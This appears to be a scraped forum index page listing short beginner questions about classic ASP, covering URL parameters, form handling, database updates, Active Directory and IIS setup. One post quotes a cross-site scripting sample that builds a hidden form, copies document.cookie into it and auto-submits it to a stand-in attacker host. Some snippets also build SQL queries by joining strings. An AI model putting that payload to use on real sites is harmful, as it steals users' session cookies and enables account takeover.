Sending Information In A URL

I would like to have my application send a 'request' to an ASP page on my server. something like:-

http://www.mydomain.com/registration.asp?name="Fred"&age="25"

The browser then displays the full URL including the
parameters: name="Fred" and age="25"

Is there any way I can send the parameters without them appearing in the URL.

View Replies


ADVERTISEMENT

Row Information

I have a database page with a table. I am using ASP and MSSQL on a Windows 2003 machine.

When I get the database information displayed in the table, I have something like the following:
<table>
<tr><td>row1</td><td>row1</td><td>row1</td<td>row1</td>
</tr>
</table>
The table has a total of 167 row that would be divided into five categories.
How can i get the above table to show:
<tr><td>row1</td><td>row2</td><td>row3</td><td>row4</td></tr>

View Replies View Related

Updating The Information

i'm trying to add the data of such client, some of his data have been added already but if i'm going to add or update his data (additional info.) what happened is the data is being added into new row not on the specific client. Code:

View Replies View Related

Error Information

I would like to email detailed error information from my website when an
error occurs.
I tried to use "On Error Resume Next" and if an error occurs check the Err
object and the AspError object returned by Server.GetLastError(), but I
didn't get the same amount of details as I can see on the browser's window
if I don't set "On Error Resume Next".
Is there a way to get detailed information from IIS ?

View Replies View Related

Status Information

I'm have a page which requires considerable database processing before writing the results to the page. I therefore wish to have a "Please wait message" up on the screen whilst the main page is processed.

I've tried Response.redirect hoping that the previous page will stay until all processing on th main page is complete and id drawn but this is not the case.

View Replies View Related

Clear Information

When I submit information i post it to a page and when it’s reloaded it runs as code accordingly if I refresh it re runs the asp because the information is still posted. How do I clear the posted information? Or possibly after it runs the asp code alter a value in the posted information.

View Replies View Related

Retrieve Information

how can i retrieve information on a form page that once previously submitted by the user so that when the user goes back to that form page it will remember what they inputted instead of having them to retype it again? do i have to use session? can somebody please help me... what would be the easiest and most efficient for a newbie to tackle this problem?

View Replies View Related

Update Information

I have an update page, when user changes their info. Click update button then go to the update.asp:Code:

LastName= Request.Form("LastName")
Conn.Execute "Update UserInfo SET UserID='" & UserID & "'

'Send an email to confirm…
'Thanks for updating your information

If I refresh the page, it keep sending email. How can we prevent sending email if he/she keep refreshing the page (do not want to disable the refresh button).

View Replies View Related

Secure Information

I've an ASP page in wich the customer write his card number for the payment. How can I make this information secure when it's sent to the server?

View Replies View Related

Information Encrypted

I have a login page, which is not in SSL. However, the script that processes this information is. While that information passes to the login page to the page that processes this information, is this information encrypted?

View Replies View Related

Hardware Information

I'm trying to make a web site that get user hardware information (processor's id and motherboard's id, one of them at least).there's been already one week and nothing yet.I have 2 servers:

windows 2003 server
windows XP professional
both have wmi and iis

View Replies View Related

Information Using SOAP?

I am looking for tutorial and/or help on regards to accessing information using SOAP using ASP. I'm proficient in ASP, but know ver little about SOAP and XML.

View Replies View Related

Two Bits Of Information

how do i insert two bits of information (email and emailend) into the one database field "email"?

Code:

SQL = "Insert INTO users (uid,pwd,firstname,lastname,email) Values ('" & uid & "','" & pwd & "','" & firstname & "','" &
lastname & "','" & email & "')"

how can you do that?

View Replies View Related

Checking For Information

I use ASP to check users data they submit. In particular, I'm checking for credit cards and I also use a server component DynuCreditCard. It basically affirms that the number "could be" a real credit card number.

Anyway, I cannot get through the website without having a legit CC#. None of the handful of testers that help cannot get through without a legit CC#. About once a month some user gets through with a blank credit card field. How do you troubleshoot something like that? I can't replicate the problem. Do you just say... "oh well... there was a computer glitch"...? How can I approach this problem?

View Replies View Related

Get Information Within A Page

If i have a combo box, automatically when the user changes the item, i want to display information from the database within a textbox, without having to go to the next page.
Currently i only know how to do this by going onto another page.

In VB it was a simple case of calling a procedure, how does it work in ASP? If i need to call a procedure, how would i do this in ASP. The example in w3schools passes the variables, can i do it without it?

View Replies View Related

Textbox Information

How do i search for user based on specific fields? I have a checkbox beside each field of Name, User ID, Email. There's a textbox beside each field for the user to fill up. How it suppose to work is the user would fill up the textboxes and check the appropriate fields to search on.

It can have a combination of searches like he can search on the name and the user ID or all 3 fields. I was thinking is it possible to store the textbox information into the checkbox of that field and retireve the information?

View Replies View Related

Exporting Information To .csv

I have a table that contains information that I need to export to a .csv file without manually saving the file, e.g click a button, information is passed and saved. I have no problem geting the information from the table, just exporting it into a .csv and then saving.

View Replies View Related

Pulling Information

I am working on a project involving pulling information from Active Directory (Name, email address, contact no.) and sticking this information in some SQL tables. Using ASP, How do I enable windows authentication (username and password from active directory) ?.

In other words, when the incharge user wants to login to the tables on the web, he must use his/her windows username and password ? On the same project, I want to assign different groups with different security levels. (something similar to the Active Directory security groups), and let the admin asign rights to each group in order to control access and privilege of each user within a group.

View Replies View Related

Storing Information From URL

how to store information after the ? in the url in form fields. i.e. http://url/test.asp?User=Rob in Form Field UserName .

View Replies View Related

Information Boxes

how the information boxes pop up when you mouse over a link? For instance in this forum, when you mouse over the Title of the thread, an information box pops up with the entire message. I assume that is Javascript, but does anyone know where I can find more information on this?

View Replies View Related

Collect Information

There is a web page (asp.net) that shows some information on a table, we need to collect these information from this web page every 6 hours and save it to a SQL data base and prepare it for further analyzes.

how can I collect the data from this web page automatically.

View Replies View Related

Information About Some Functions

i'm starting at ASP now and I'm searching some information about it. For example, I need to know all about Application object. Some oficial documentation where I can find it?

View Replies View Related

Login Information?!

Earlier this week i asked a question about using SQL to select information from a database as part of a sign up script that checks to see if a clients chosen login name has already been taken.

now Im attempting to do the login page for the site. The login scripts are made of two pages - the actual login.asp page, which contains a very simple form, and the dologin.asp page, which checks the information they enter with the information in the database.

This section of code is designed to check whether or not the login name they have entered is even in the database at the moment, and will later check things like passwords.... The script on the dologin.asp page is as follows: Code:

View Replies View Related

Export All Information

i am so sorry because asking this problem. u have read thru several solutions within this forum and i think i still a clear explanation regarding my problem. it works like this, a customer could view his/her reservation after entering his/her reservation ID.

a complete detail will appear in a HTML table. this table is located in a form tag because it allows customer to update the information. besides, customer also allowed to print the reservation detail by clicking the print button. my question is how to export all the information to ms word? i stucked because this page also allow customer to make changes. what i am thinking is to use 2 form tags but both have different action/process.

View Replies View Related

Copy Information

I have a form that has a place for "Customer" and "CO-Customer" information. I want to put a button by the CO-Customer section that will copy the Address information from the Customer. Do I have that button be a Submit button that posts the information back to
the form and the writes it?

View Replies View Related

Saleslogix Information

I am trying to insert the products purchased off our website into Saleslogix - any information out there - websites, links etc.?

View Replies View Related

Inserting Information

I am retrieving a record from the database and inserting the information into a form on an html page. I am able to bring up the information and in the correct location but the problem is If the cell has more than one word in it it only gives me the first word and nothing after a space.

This is what I am doing:

Code:

<td>Position(s) Applied for</td><td><input type="text" name="position" size="120"
value=<%=rs("position")%>></td>

View Replies View Related

When Select A Name Then Show The Whole Information About It

I have table that list some companies, when the user selects the company a form comes up that list all the company info, where they can view it and also update some info. One of the fields they update is a drop down list. I'm having trouble populating the menu with the value from the company it comes up blank. Here is the code:

View Replies View Related

About Acquiring Cookie Information By XSS

In an article of MSDN website,there are some codes about acquiring Cookie information by XSS.

<a href=http://www.hexair-sample-13.com/req.asp?name=
<FORM action=http://www.badsite-sample-13.com/data.asp
method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie;
idForm.submit();
</SCRIPT> >
Click here!
</a>

But "<" befor "Form" wasn't saw as tag by browser when I put these codes into my HTML page and run the page.it was displayed in Hyperlink address.so ,these codes couldn't work as expected.

View Replies View Related

Internet Information Service

I would like to test ASP websites
and therefore I neet the Internet Information Service
feature from Win XP. The problem is that I have Win XP
Home Edition. Is there any way to upgrade this feature
called Internet Information Service to my Win XP Home
Edition system?

I thought there might be a file to find at the windows
download page but I just found Internet Information
Service security patches. Is there any file that installs
this feature called Internet Information Service (IIS).

View Replies View Related

Add Information If The Fields Are Present

I have a file which is performing a mail merge. It grabs data from the database and then merges with the bookmarks in a template document if the fields are present.

I have set write permissions on the docs folder it should be saving the file to but when I redirect to the file its not being saved.

Not sure whats happening here....hope someone can shed some light or help me in building another script. The main feature i need to add to the mail merge is the ability to only add information if the fields are present. Code:

View Replies View Related

Grabbing Information From Session

I have this site to where people can get access to via a username and passwrod. THere is also a download section in here, but i want to limit the amount of downloads, but i also am covering up where the download is located. So when someone hits download on the page, they get sent to an asp page. This asp page has a response.redirect to download the file.

I have stored the peoples username and password in a session. I can "response.write" the infromatino that is in the session, yet i can not assign that information to a variable. Code:

View Replies View Related

Accessing ADSI Information

In the intranet system I'm building I need to draw information about Staff and integrate it into Department pages, and make it accessible via querystrings (so users can search for names). I've asked my IT department how to do this and they basically said "ask the internet"

So, if I want to access such information, where do I start? I cant find any tutorials that answer my questions, and feel a bit out of my depth regarding what I'm even meant to be asking. So basically... help! What's should be my plan of action!

I need to :

A) draw names, phone numbers, email addresses to show on relevant department pages.

B) Make a facility to search staff names to bring up similar information.

View Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved